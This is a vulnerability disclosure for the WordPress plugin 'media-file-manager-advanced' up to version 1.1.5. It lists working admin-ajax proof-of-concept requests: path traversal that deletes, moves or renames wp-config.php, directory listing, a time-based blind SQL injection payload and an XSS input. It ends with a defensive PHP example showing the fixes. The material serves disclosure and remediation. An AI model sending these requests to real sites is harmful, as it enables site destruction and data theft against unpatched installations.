Description
The WordPress plugin "media-file-manager-advanced" lets any authenticated user execute administrator actions because its admin-ajax handlers perform weak permission checks. An attacker can delete and update posts; create, remove and list directories; move, rename and delete files; and perform blind SQL injection and cross-site scripting.

Homepage: https://wordpress.org/plugins/media-file-manager-advanced/
Affected Version: <= 1.1.5
Vulnerability Scope: LFD, SQL, XSS, site ruining and changing of content
Authorization Required: User

Proof of Concept
(all requests go to admin-ajax.php as an authenticated user; parameters are sent as POST data)

Post Delete
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_delete
POST: id=17

MKDIR
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_mkdir
POST: newdir=EVEXFOLDER
Result: folder exists at http://domain.tld/wp-content/uploads/EVEXFOLDER

RMDIR (directory must be empty)
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_delete_empty_dir
POST: dir=EVEXFOLDER&name=
Result: http://domain.tld/wp-content/uploads/EVEXFOLDER is not found

UNLINK
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_delete
POST: dir=../../&name=wp-config.php
Result: wp-config.php no longer exists

Blind SQL Injection
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_get_image_insert_screen
POST: id=1 AND (SELECT * FROM (SELECT(SLEEP(10)))LCKZ)
Result: the response sleeps for 10 seconds

XSS
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_get_image_insert_screen
POST: id="
Result: Alerts(1)

Update Post
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_update_media_information
POST: id=34&title=New_Title&caption=bla&description=Dummy Description

Move Files
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_move
POST: dir_from=../../&items=wp-config.php&dir_to=
Result: wp-config.php is now at /wp-content/uploads/wp-config.php

Renaming Files
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_rename
POST: dir=../../&from=wp-config.php&to=wp-config.txt
Result: wp-config.php is renamed to wp-config.txt

Directory Listing
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_getdir
POST: dir=../../
Result: lists all files and directories

Fix
No fix available at the moment.

Timeline
Notified vendor - no reply
Published disclosure
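As an added illustration, not code from the plugin or from the original advisory, the checks a WordPress admin-ajax handler needs to close the three root causes above: a capability check plus nonce for every action, a realpath containment check against the uploads directory for the dir parameter, and an integer-only prepared query for id. The hook, function, capability and nonce names are hypothetical choices.

```php
<?php
// Added illustration, not the plugin's code. Hook, function and nonce names are hypothetical.
add_action( 'wp_ajax_mfma_safe_delete', 'mfma_safe_delete' );             // logged-in users only
add_action( 'wp_ajax_mfma_safe_image_screen', 'mfma_safe_image_screen' ); // no wp_ajax_nopriv_
// Resolve $relative inside uploads; false if it escapes (stops dir=../../). Existing paths only.
function mfma_safe_upload_path( $relative ) {
    $base   = realpath( wp_upload_dir()['basedir'] );
    $target = realpath( $base . '/' . ltrim( $relative, '/' ) );
    if ( false === $base || false === $target ) {
        return false;
    }
    return ( $target === $base || 0 === strpos( $target, $base . DIRECTORY_SEPARATOR ) ) ? $target : false;
}

function mfma_safe_delete() {
    if ( ! current_user_can( 'manage_options' ) ) {   // capability: admins only, not any user
        wp_send_json_error( 'forbidden', 403 );
    }
    check_ajax_referer( 'mfma_file_op', 'nonce' );      // CSRF: dies on a missing or bad nonce
    $dir  = sanitize_text_field( wp_unslash( $_POST['dir'] ?? '' ) );
    $name = sanitize_file_name( wp_unslash( $_POST['name'] ?? '' ) ); // strips path separators
    $dir_path = mfma_safe_upload_path( $dir );
    if ( '' === $name || false === $dir_path ) {
        wp_send_json_error( 'invalid path', 400 );
    }
    $file = $dir_path . DIRECTORY_SEPARATOR . $name;
    if ( ! is_file( $file ) || ! unlink( $file ) ) {
        wp_send_json_error( 'delete failed', 400 );
    }
    wp_send_json_success( basename( $file ) );
}

function mfma_safe_image_screen() {
    global $wpdb;
    if ( ! current_user_can( 'upload_files' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    check_ajax_referer( 'mfma_file_op', 'nonce' );
    $id  = absint( $_POST['id'] ?? 0 );                 // integer only: no "1 AND (SELECT ...)"
    $row = $wpdb->get_row( $wpdb->prepare(
        "SELECT ID, post_title FROM {$wpdb->posts} WHERE ID = %d AND post_type = 'attachment'",
        $id
    ) );
    if ( ! $row ) {
        wp_send_json_error( 'not found', 404 );
    }
    // Escape before the value can land in HTML; closes the id=" reflection.
    wp_send_json_success( array( 'id' => (int) $row->ID, 'title' => esc_html( $row->post_title ) ) );
}
```

The realpath check only accepts paths that already exist, which is the right behaviour for delete and rename but not for mkdir, where the parent directory rather than the new path must be validated.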